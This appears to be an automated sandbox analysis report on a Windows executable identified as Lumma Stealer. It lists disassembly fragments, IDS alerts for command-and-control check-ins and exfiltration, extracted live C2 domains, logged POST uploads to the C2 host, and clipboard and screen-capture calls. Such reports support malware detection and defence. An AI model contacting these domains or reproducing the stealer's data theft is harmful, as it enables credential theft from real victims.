Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+4D4614C0h]	0_2_0096BD87
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	0_2_0096ED27
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov edx, eax	0_2_0097BE80
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0097BE80
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov ecx, eax	0_2_00972EB7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00972EB7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B1025CF1h	0_2_0098BEC1
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+esi]	0_2_00952E17
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov ecx, edx	0_2_0095AE27
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0097BE22
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0097CE29
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-48h]	0_2_00974E47
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0097BE4C
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then mov esi, edx	0_2_00979E63
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_0097AF17
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+20h]	0_2_00977F03
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+38F6967Eh]	0_2_0095BF5E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz) : 192.168.2.10:61720 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058040 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI) : 192.168.2.10:49711 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058040 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI) : 192.168.2.10:49702 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058040 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI) : 192.168.2.10:49705 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058040 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI) : 192.168.2.10:49706 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058040 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI) : 192.168.2.10:49703 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058040 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI) : 192.168.2.10:49709 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058040 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI) : 192.168.2.10:49707 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058040 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI) : 192.168.2.10:49704 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49702 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49702 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49704 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49703 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49703 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49711 -> 104.21.32.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: brendon-sharjen.biz
Source: Malware configuration extractor	URLs: wrathful-jammy.cyou
Source: Malware configuration extractor	URLs: debonairnukk.xyz
Source: Malware configuration extractor	URLs: sordid-snaked.cyou
Source: Malware configuration extractor	URLs: immureprech.biz
Source: Malware configuration extractor	URLs: awake-weaves.cyou
Source: Malware configuration extractor	URLs: deafeninggeh.biz
Source: Malware configuration extractor	URLs: effecterectz.xyz
Source: Malware configuration extractor	URLs: diffuculttan.xyz

Source: Joe Sandbox View

IP Address: 104.21.32.1 104.21.32.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49711 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49705 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49703 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49709 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49702 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49707 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49706 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49704 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: brendon-sharjen.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: brendon-sharjen.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E1W1UCNHMM6I5H3131User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: brendon-sharjen.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NTPO6A4G0U2IZ9QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15063Host: brendon-sharjen.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7FX96EHX91User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20395Host: brendon-sharjen.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2W80AL7USGDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1211Host: brendon-sharjen.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VR413592CERZVWBS8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1125Host: brendon-sharjen.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: brendon-sharjen.biz

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: brendon-sharjen.biz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: brendon-sharjen.biz

Source: vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: vPqd8HLs88.exe, 00000000.00000003.1555845377.000000000057B000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511725353.000000000057B000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1534520695.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: vPqd8HLs88.exe, 00000000.00000003.1555845377.000000000057B000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1534699018.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511725353.000000000057B000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1534497427.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1534520695.000000000057B000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1512185514.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1555552889.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511705671.00000000005DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz/
Source: vPqd8HLs88.exe, 00000000.00000003.1534699018.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511893340.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511873950.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511705671.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1534744341.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511854208.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz//
Source: vPqd8HLs88.exe, 00000000.00000003.1555552889.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000002.1667699253.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz/03
Source: vPqd8HLs88.exe, 00000000.00000003.1555823181.00000000005DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz/api
Source: vPqd8HLs88.exe, 00000000.00000003.1555552889.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz/apid2
Source: vPqd8HLs88.exe, 00000000.00000003.1555552889.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz/d
Source: vPqd8HLs88.exe, 00000000.00000003.1556027423.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1555552889.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz/i
Source: vPqd8HLs88.exe, 00000000.00000003.1534699018.00000000005F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz/l
Source: vPqd8HLs88.exe, 00000000.00000002.1667413749.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz/n
Source: vPqd8HLs88.exe, 00000000.00000002.1667699253.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz/pia3
Source: vPqd8HLs88.exe, 00000000.00000003.1555845377.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1555134997.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1512030202.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1476087054.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000002.1667413749.00000000005CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz:443/api
Source: vPqd8HLs88.exe, 00000000.00000003.1451173593.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1451493959.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1452123119.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1451751045.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1451002983.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1451409856.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1555134997.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1512030202.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1450946815.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1452325227.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1476087054.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz:443/apiOn
Source: vPqd8HLs88.exe, 00000000.00000002.1667413749.00000000005CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz:443/apiilesCOMPUTERNAME=user-PCComSpec=C:
Source: vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vPqd8HLs88.exe, 00000000.00000003.1478027000.0000000003186000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: vPqd8HLs88.exe, 00000000.00000003.1478027000.0000000003186000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: vPqd8HLs88.exe, 00000000.00000003.1478027000.0000000003186000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
Source: vPqd8HLs88.exe, 00000000.00000003.1478027000.0000000003186000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
Source: vPqd8HLs88.exe, 00000000.00000003.1478027000.0000000003186000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: vPqd8HLs88.exe, 00000000.00000003.1478027000.0000000003186000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: vPqd8HLs88.exe, 00000000.00000003.1478027000.0000000003186000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.10:49711 version: TLS 1.2

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Code function: 0_2_00431EF0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_00431EF0

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Code function: 0_2_00431EF0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_00431EF0

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Code function: 0_2_00432060 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

0_2_00432060

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1667924711.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042C856	0_2_0042C856
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00415871	0_2_00415871
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0043E8E0	0_2_0043E8E0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_004089E0	0_2_004089E0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00439AD0	0_2_00439AD0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042C294	0_2_0042C294
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00426B10	0_2_00426B10
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00436BE0	0_2_00436BE0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00410C48	0_2_00410C48
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0040D60B	0_2_0040D60B
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00423E10	0_2_00423E10
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00436E90	0_2_00436E90
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00411754	0_2_00411754
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042CF7E	0_2_0042CF7E
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0043DFA0	0_2_0043DFA0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042786E	0_2_0042786E
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00428005	0_2_00428005
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_004300C0	0_2_004300C0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_004378D0	0_2_004378D0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_004098F0	0_2_004098F0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00438089	0_2_00438089
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0041E8A0	0_2_0041E8A0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0041A0A0	0_2_0041A0A0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_004150B0	0_2_004150B0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0041B8B0	0_2_0041B8B0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00429940	0_2_00429940
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00416152	0_2_00416152
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00405910	0_2_00405910
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00409120	0_2_00409120
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0041E120	0_2_0041E120
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00403930	0_2_00403930
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042D180	0_2_0042D180
